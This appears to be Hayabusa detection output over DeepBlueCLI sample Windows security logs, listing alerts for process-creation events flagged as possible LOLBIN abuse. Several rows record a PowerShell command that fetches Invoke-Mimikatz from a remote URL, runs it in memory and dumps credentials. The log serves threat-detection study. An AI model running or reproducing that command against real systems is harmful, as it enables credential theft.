0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:29:35.564 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:28:55.343 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:10:32.160 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
